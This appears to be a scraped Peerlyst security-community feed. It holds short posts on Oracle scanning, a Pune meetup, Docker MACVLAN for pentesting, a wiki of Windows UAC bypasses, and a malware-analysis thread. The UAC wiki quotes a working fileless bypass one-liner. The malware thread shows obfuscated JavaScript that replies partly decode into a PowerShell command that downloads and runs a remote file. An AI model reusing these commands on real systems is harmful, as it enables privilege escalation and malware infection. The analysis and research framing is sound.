Invite to discuss

Want posts & news about #null on your wall?

Sign Up

null

Posts
26
Experts
19
Views
17.9K
Shares
89
Upvotes
517

Posts

Start the discussion...
DATAPLUS

Oracle database security scan - Part II - practical implementation

How do we build Oracle database security controls? How do we implement scanning of an Oracle database for security vulnerability postures, as an in-house solution, with no extra tools and minimal time spent? It is advised that you take a look before at my previous article "Oracle database security scan - Part I - process explained", or be aware of the things said there. Referring to th… Read more
2
Start the discussion...
Himanshu Anand

Last Call! Peerlyst Pune Meetup, June 3rd

Hi All, I am pleased to announce that we will be doing out next peerlyst pune meetup‍ chapter meetup‍ with null‍ Pune monthly meetup, on: 3rd of June, 2017. Venue: Payatu‍ office (502, Tej House, MG Road, Camp, Pune, Maharashtra 411001) Time: June 3rd, 2017, 10:30 AM Sharp. Do come and join us over there, if any of you got some topic which you wa… Read more
27
4
Join the discussion...
Shubham Aher
Below is my topic abstract For 03JUNE2017 null PUNE MEETUP: Title: Understanding Android(Dalvik) Bytecode Injection aka Trojanizing Android App In this session, we will try to understand the process of modifying Android(Dalvik) bytecode manually.
3
3
Philippe Bogaerts

Docker pentester series #1 : MACVLAN

Docker supports a network driver, called MACVLAN. It allows to bind a container directly to the network interface card of the docker host through a sub-interface, supporting VLAN’s as well as a flat underlay network. This is extremely interesting from a pen-testing point of view. It looks like the container is directly connected to the underlay network and network traffic is not intercepte… Read more
8
3
Join the discussion...
Philippe Bogaerts
You can run a nginx container like 'docker run -d -p 80:80 nginx' and then docker will run the container and expose port 80 on the node, which is indeed way easier. The idea of the article is to run a container directly attached to the network interface card. NGINX is a simple example. I'll publish an article soon, how we can use this technique to test spoofing, D(DOS), … Read more
2
1
Karl M.
So you made a webserver available on the local network from a docker container? That's nice, that's a lot of steps to do that, is there no easier way to achieve this?
Nic Cancellari

Wiki: UAC Bypasses and UAC bypass research

I want to build a new wiki list of UAC bypasses and research posts about this topic. Please help me out. Via Tiraniddo (requires an existing elevated process): Capture the admin token and create a restricted version which is no longer elevated. Impersonate the token and get a system service to create a new process using that token. This results in a low-privilege new process which happens to… Read more
45
5
Join the discussion...
Nic Cancellari
I added a new UAC bypass: Another unpatched UAC bypass here: https://github.com/SandboxEscaper/UAC
Claus Cramon Houmann
Tweet size UAC bypass to add: set a=hkcu\Environment /v windir /reg add %a%d "cmd /K reg delete %a%f||"schtasks/Run /TN \Microsoft\Windows\DiskCleanup\SilentCleanup /I— James Forshaw (@tiraniddo) May 15, 2017 Tweet is for a silent, "fileless" UAC bypass on Win10 which should be fixed in RS3 :-). Bit more info on my blog https://t.co/wsIaOo7FYZ— James Forshaw (… Read more
1
Mark Sitkowski

Fun With Malware Part Four

This one comes from the same source as the last two Javascript hacks. Any ideas as to what it does? function nurujk(ifydo, usnojy, faxyli, xumpe) { xusi = [xumpe[usnojy]][0]; return xusi; } function yfhuz() { var morapidi = undefined; return morapidi; } function rryte(okefxo, pocfyv, epiqe, iracbov) { wnavyjb = [iracbov[pocfyv]][0]; return wnavyjb… Read more
19
8
Join the discussion...
Rahul Pratap Singh
Agree with Himanshu. Alerts/Breakpoints will save time during dynamic analysis. But in this case, you could also try static analysis, as code is simple, just consists of some junk code with pattern. Essence of the code is as follows:var yxofz = 'WScript.Shell';var bcopvexumu = new ActiveXObject(yxofz);bcopvexumu.run(cmd.exe /c \"powershell (Set-Execution Policy Bypass -Scope Proces… Read more
2
2
Himanshu Anand
hey,I haven't analyzed it completely. though it looks like it will form something like run cmd.exe /c \"powershell $erydo='^?f=1.gif'',$pa';$olydxi='^ " -Scope Proce';$jzyse='^ss; $path=($e';$iqoply='^www.weekendlk';$ntishi='^File(''http://';$ubimi='^th); Start-Pr';$bujyrr='^nv:temp+&… Read more
3
4